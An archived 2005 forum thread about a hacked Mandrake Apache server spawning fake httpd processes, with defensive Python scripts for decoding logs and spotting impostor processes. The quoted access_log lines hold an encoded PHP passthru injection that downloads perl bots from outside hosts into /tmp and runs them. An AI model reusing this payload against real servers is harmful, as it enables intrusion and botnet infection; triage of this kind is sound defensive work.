Apache Server configuration support - strange apache processes


Khorne

2005-01-20, 7:54 am

Hi,


I work on Apache on Mandrake 10.1 and I found that Apache launches strange
processes.

Normal processes under mandrake look like this:

httpd2 -f
/etc/httpd/conf/httpd2.conf -DAPACHE2 -DHAVE_PHP4 -DHAVE_ACCESS -DHAVE ...

But a few minutes after starting Apache, Apache launches processes like this:
/usr/local/apache/bin/httpd -DSSL
/usr/local/apache/bin/httpd - D55L
/usr/local/apache/bin/httpd - D5SL

These processes don't stop when I stop Apache and I can't restart Apache
until I kill them.
And of course there are no httpd files under the /usr/local/apache/bin/ directory.

I think it's a virus or a worm.

Below are a few lines from access_log:

127.0.0.1 - - [20/Jan/2005:09:52:07 +0100] "GET /your_server_is_infected_by_shanty.html?iID=188& rush=%2565%2563%2568%256F%2520%255F%2553%2554%2541%2552%2554%255F%253B%2520cd%2520/tmp%3bmkdir%2520.temp22%3bcd%2520.temp22%3bwget%2520http://www.quasi-sane.com/pics/bot.htm%3bwget%2520http://weblicious.com/.notes/ssh2.htm%3bperl%2520ssh2.htm%3brm%2520ssh.htm%3bperl%2520bot.htm%3brm%2520bot. htm%253B%2520%2565%2563%2568%256F%2520%255F%2545%254E%2544%255F&highlight=%252527. %2570%2561%2573%2573%2574%2568%2572%2575%2528%2524%2548%2554%2554%2550%255F%2547%2545%2554%255F%2556%2541%2552%2553%255B%2572%2575%2573%2568%255D%2529.%252527'%3b HTTP/1.1" 404 364 "-" "LWP::Simple/5.800"
127.0.0.1 - - [20/Jan/2005:09:52:12 +0100] "GET /?t=13714& rush=%2565%2563%2568%256F%2520%255F%2553%2554%2541%2552%2554%255F%253B%2520cd%2520/tmp%3bmkdir%2520.temp22%3bcd%2520.temp22%3bwget%2520http://www.quasi-sane.com/pics/bot.htm%3bwget%2520http://weblicious.com/.notes/ssh2.htm%3bperl%2520ssh2.htm%3brm%2520ssh.htm%3bperl%2520bot.htm%3brm%2520bot. htm%253B%2520%2565%2563%2568%256F%2520%255F%2545%254E%2544%255F&highlight=%252527. %2570%2561%2573%2573%2574%2568%2572%2575%2528%2524%2548%2554%2554%2550%255F%2547%2545%2554%255F%2556%2541%2552%2553%255B%2572%2575%2573%2568%255D%2529.%252527'%3b HTTP/1.1" 200 6980 "-" "LWP::Simple/5.800"
127.0.0.1 - - [20/Jan/2005:09:54:12 +0100] "GET /?t=6& rush=%2565%2563%2568%256F%2520%255F%2553%2554%2541%2552%2554%255F%253B%2520cd%2520/tmp%3bmkdir%2520.temp22%3bcd%2520.temp22%3bwget%2520http://www.quasi-sane.com/pics/bot.htm%3bwget%2520http://weblicious.com/.notes/ssh2.htm%3bperl%2520ssh2.htm%3brm%2520ssh.htm%3bperl%2520bot.htm%3brm%2520bot. htm%253B%2520%2565%2563%2568%256F%2520%255F%2545%254E%2544%255F&highlight=%252527. %2570%2561%2573%2573%2574%2568%2572%2575%2528%2524%2548%2554%2554%2550%255F%2547%2545%2554%255F%2556%2541%2552%2553%255B%2572%2575%2573%2568%255D%2529.%252527'%3b HTTP/1.1" 200 6980 "-" "LWP::Simple/5.800"
127.0.0.1 - - [20/Jan/2005:10:45:12 +0100] "GET / HTTP/1.1" 200 6980 "-" "LWP::Simple/5.800"
127.0.0.1 - - [20/Jan/2005:10:45:13 +0100] "GET / HTTP/1.1" 200 6980 "-" "LWP::Simple/5.800"
127.0.0.1 - - [20/Jan/2005:10:46:30 +0100] "GET / HTTP/1.1" 200 6980 "-" "LWP::Simple/5.800"


Thanks for your help,


Khorne
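The request parameters in those access_log lines are percent-encoded two and three times over; decoding them is the first thing a defender does when triaging such entries. The following script is an added example, not code from the thread: it strips the encoding layers and flags parameters that decode to a chain of shell commands or a PHP code fragment. The sample line is constructed to mirror the quoted entry (same encoding scheme, download host replaced by a placeholder), and the regexes and function names are my own.

```python
import re
import urllib.parse
# Constructed sample modelled on the access_log entry quoted in the post (same layered
# percent-encoding, download host replaced by a placeholder) plus one benign request.
SAMPLE_LOG = [
    '127.0.0.1 - - [20/Jan/2005:09:52:07 +0100] "GET /index.html?iID=188&rush='
    '%2565%2563%2568%256F%2520%255F%2553%2554%2541%2552%2554%255F%253B%2520cd%2520/tmp'
    '%3bmkdir%2520.temp22%3bcd%2520.temp22%3bwget%2520http://example.invalid/bot.htm'
    '%3bperl%2520bot.htm%3brm%2520bot.htm&highlight=%252527.%2570%2561%2573%2573'
    '%2574%2568%2572%2575%2528%2524%2548%2554%2554%2550%255F%2547%2545%2554%255F'
    "%2556%2541%2552%2553%255B%2572%2575%2573%2568%255D%2529.%252527'%3b HTTP/1.1\""
    ' 404 364 "-" "LWP::Simple/5.800"',
    '10.0.0.5 - - [20/Jan/2005:10:45:12 +0100] "GET /?t=13714&highlight=apache'
    ' HTTP/1.1" 200 6980 "-" "Mozilla/5.0"',
]
LOG_RE = re.compile(r'^(\S+) \S+ \S+ \[[^\]]+\] "\S+ (\S+) [^"]*" \d{3} \S+ "[^"]*" "([^"]*)"')
SHELL_CMD = re.compile(r"(?:^|[;&|\s])(?:cd|mkdir|wget|curl|perl|sh|rm|chmod)\s")
PHP_CODE = re.compile(r"\b(?:passthru|system|exec|shell_exec|eval)\s*\(|HTTP_GET_VARS")

def fully_decode(value, max_rounds=4):
    """Percent-decode until the value stops changing; return (text, rounds applied)."""
    rounds = 0
    while rounds < max_rounds and urllib.parse.unquote(value) != value:
        value, rounds = urllib.parse.unquote(value), rounds + 1
    return value, rounds

def analyse_request(line):
    """Decode each query parameter of one log line and report the suspicious ones."""
    m = LOG_RE.match(line)
    if not m:
        return None
    path, _, query = m.group(2).partition("?")
    findings = []
    for pair in query.split("&") if query else []:
        name, _, raw = pair.partition("=")
        decoded, rounds = fully_decode(raw)
        reasons = []
        if SHELL_CMD.search(decoded):
            reasons.append("shell command chain")
        if PHP_CODE.search(decoded):
            reasons.append("PHP code fragment")
        if rounds >= 2:  # browsers encode once; extra layers are there to slip past filters
            reasons.append("percent-encoded %d times" % rounds)
        if reasons:
            findings.append({"param": name, "decoded": decoded, "reasons": reasons})
    return {"client": m.group(1), "path": path, "agent": m.group(3), "findings": findings}

def suspicious_requests(lines):
    return [r for r in map(analyse_request, lines) if r and r["findings"]]
```

Run against the sample, the `rush` parameter decodes to `echo _START_; cd /tmp;mkdir .temp22;cd .temp22;wget ...;perl bot.htm;rm bot.htm` and `highlight` to `'.passthru($HTTP_GET_VARS[rush]).'';`, which is exactly why the poster's box ended up running processes that Apache never started.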




Davide Bianchi

2005-01-20, 7:54 am

On 2005-01-20, Khorne <khorne_fr1@hotmail.com> wrote:
> But few minutes after starting apache, apache launch processes like this
> /usr/local/apache/bin/httpd -DSSL


What does ps -ef | grep httpd show?

> And of course there is no httpd files under /usr/local/apache/bin/ directory


Then it is trying to run a process that doesn't exist. I don't think
Apache is the culprit.

> Below are a few lines from access_log:
> 127.0.0.1 - - [20/Jan/2005:09:52:07 +0100] "GET /your_server_is_infected_by_shanty.html?iID=188& rush=%2565%2563%2568%256F%2520%255F%2553%2554%2541%2552%2554%255F%253B%2520cd%2520/tmp%3bmkdir%2520.temp22%3bcd%2520.temp22%3bwget%2520http://www.quasi-sane.com/pics/bot.htm%3bwget%2520http://weblicious.com/.notes/ssh2.htm%3bperl%2520ssh2.htm%3brm%2520ssh.htm%3bperl%2520bot.htm%3brm%2520bot. htm%253B%2520%2565%2563%2568%256F%2520%255F%2545%254E%2544%255F&highlight=%252527. %2570%2561%2573%2573%2574%2568%2572%2575%2528%2524%2548%2554%2554%2550%255F%2547%2545%2554%255F%2556%2541%2552%2553%255B%2572%2575%2573%2568%255D%2529.%252527'%3b

It looks like some kind of virus. Checked on google?

Davide

--
Bang on the LEFT side of your computer to restart Windows.
Khorne

2005-01-20, 7:54 am

That's what ps -ef | grep httpd shows:

root 19995 1 0 13:15 ? 00:00:00 httpd2 -f /etc/httpd/conf/httpd2.conf -DAPACHE2...
apache 20003 19995 0 13:15 ? 00:00:04 httpd2 -f /etc/httpd/conf/httpd2.conf -DAPACHE2...
apache 20024 19995 0 13:15 ? 00:00:06 httpd2 -f /etc/httpd/conf/httpd2.conf -DAPACHE2...
apache 20056 19995 0 13:15 ? 00:00:01 httpd2 -f /etc/httpd/conf/httpd2.conf -DAPACHE2...
apache 20331 19995 0 13:36 ? 00:00:05 httpd2 -f /etc/httpd/conf/httpd2.conf -DAPACHE2...
apache 20332 19995 0 13:36 ? 00:00:02 httpd2 -f /etc/httpd/conf/httpd2.conf -DAPACHE2...
apache 20333 19995 0 13:36 ? 00:00:02 httpd2 -f /etc/httpd/conf/httpd2.conf -DAPACHE2...
apache 20334 19995 0 13:36 ? 00:00:04 httpd2 -f /etc/httpd/conf/httpd2.conf -DAPACHE2...
apache 20335 19995 0 13:36 ? 00:00:03 httpd2 -f /etc/httpd/conf/httpd2.conf -DAPACHE2...
apache 20337 19995 0 13:36 ? 00:00:03 httpd2 -f /etc/httpd/conf/httpd2.conf -DAPACHE2...
apache 20436 1 0 13:42 ? 00:00:05 /usr/local/apache/bin/httpd - D5SL
apache 20507 19995 0 13:54 ? 00:00:02 httpd2 -f /etc/httpd/conf/httpd2.conf -DAPACHE2...
apache 20557 1 0 13:55 ? 00:00:03 /usr/local/apache/bin/httpd - D5SL
apache 20605 19995 0 13:55 ? 00:00:01 httpd2 -f /etc/httpd/conf/httpd2.conf -DAPACHE2...
apache 20778 19995 0 14:12 ? 00:00:00 httpd2 -f /etc/httpd/conf/httpd2.conf -DAPACHE2...
apache 20927 19995 0 14:25 ? 00:00:00 httpd2 -f /etc/httpd/conf/httpd2.conf -DAPACHE2...
root 20931 20928 0 14:25 ? 00:00:00 sh -c (ps -ef | grep httpd) 2>&1
root 20932 20931 0 14:25 ? 00:00:00 sh -c (ps -ef | grep httpd) 2>&1
root 20934 20932 0 14:25 ? 00:00:00 grep httpd


I've been searching on Google for a worm or virus like this, but I didn't
find anything.

Is there a quick solution to block these processes until I find a real
solution?


"Davide Bianchi" <davideyeahsure@onlyforfun.net> wrote in message
news: slrncuv7vv.186.davideyeahsure@fogg.onlyforfun.net...
> On 2005-01-20, Khorne <khorne_fr1@hotmail.com> wrote:
>
> What a ps -ef | grep httpd shows?
>
>
> Then is trying to run a process that doesn't exist. I don't think that is
> apache the culprit.
>
>
> It looks like some kind of virus. Checked on google?
>
> Davide
>
> --
> Bang on the LEFT side of your computer to restart Windows.



Davide Bianchi

2005-01-20, 5:59 pm

On 2005-01-20, Khorne <khorne_fr1@hotmail.com> wrote:
> That's what ps -ef | grep httpd shows:
>
> root 19995 1 0 13:15 ? 00:00:00 httpd2 -f
> /etc/httpd/conf/httpd2.conf -DAPACHE2...
> apache 20003 19995 0 13:15 ? 00:00:04 httpd2 -f
> /etc/httpd/conf/httpd2.conf -DAPACHE2...


> apache 20436 1 0 13:42 ? 00:00:05
> /usr/local/apache/bin/httpd - D5SL
> apache 20557 1 0 13:55 ? 00:00:03
> /usr/local/apache/bin/httpd - D5SL


Ok, the first one is the 'correct' apache, the second one
is evidently a bugged version or the clear indication that your
machine has been hacked.

> Is there a kick solution to block this processes until a find a real
> solution?


Yes, pull the plug on your machine, boot from a clean media, mount
the partition read-only.

Davide

--
Windows Tip of the Day:
Add DEVICE=FNGRCROS.SYS to your CONFIG.SYS file.
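Davide's reading of the ps listing (workers forked by the real master versus orphans claiming a binary that is not on disk) can be turned into a mechanical check. The script below is an added example, not code from the thread: it parses ps -ef output, keeps the httpd-looking entries, and flags any whose parent is not the known master PID or whose argv[0] path does not exist. The sample listing is constructed to mirror the poster's output; `exists` and `exe` are injectable so the logic can be tested off the compromised host, and `real_exe` (Linux /proc) is the check a live triage would add, since argv is self-reported and the "- D5SL" spoofing in the listing shows why.

```python
import os
import re
# Constructed `ps -ef` sample modelled on the listing in the thread: the real master
# (PID 19995) with a worker, and two orphans whose argv[0] is a path that is not on disk.
SAMPLE_PS = """\
root     19995     1  0 13:15 ?        00:00:00 httpd2 -f /etc/httpd/conf/httpd2.conf -DAPACHE2
apache   20003 19995  0 13:15 ?        00:00:04 httpd2 -f /etc/httpd/conf/httpd2.conf -DAPACHE2
apache   20436     1  0 13:42 ?        00:00:05 /usr/local/apache/bin/httpd - D5SL
apache   20557     1  0 13:55 ?        00:00:03 /usr/local/apache/bin/httpd - D5SL
root     20934 20932  0 14:25 ?        00:00:00 grep httpd
"""
# ps -ef columns: UID PID PPID C STIME TTY TIME CMD
PS_RE = re.compile(r"^(\S+)\s+(\d+)\s+(\d+)\s+\d+\s+\S+\s+\S+\s+\S+\s+(.+)$")

def parse_ps(text):
    """Turn `ps -ef` output into dicts with user, pid, ppid and argv."""
    procs = []
    for line in text.splitlines():
        m = PS_RE.match(line)
        if m:
            procs.append({"user": m.group(1), "pid": int(m.group(2)),
                          "ppid": int(m.group(3)), "argv": m.group(4).split()})
    return procs

def real_exe(pid):
    """Kernel's view of the binary behind a PID (Linux); None if unreadable."""
    try:
        return os.readlink("/proc/%d/exe" % pid)
    except OSError:
        return None

def find_impostors(procs, master_pid, exists=os.path.exists, exe=lambda pid: None):
    """Flag httpd-looking processes the real master did not fork, whose claimed binary
    is not on disk, or (with exe=real_exe on a live host) whose /proc exe differs."""
    hits = []
    for p in procs:
        argv0 = p["argv"][0]
        if not os.path.basename(argv0).startswith("httpd") or p["pid"] == master_pid:
            continue
        reasons = []
        if p["ppid"] != master_pid:
            reasons.append("parent is PID %d, not the httpd master" % p["ppid"])
        if argv0.startswith("/") and not exists(argv0):
            reasons.append("%s does not exist on disk" % argv0)
        real = exe(p["pid"])
        if real and os.path.basename(real.replace(" (deleted)", "")) != os.path.basename(argv0):
            reasons.append("really running %s" % real)
        if reasons:
            hits.append((p["pid"], " ".join(p["argv"]), reasons))
    return hits
```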
Copyright 2003 - 2008 webservertalk.com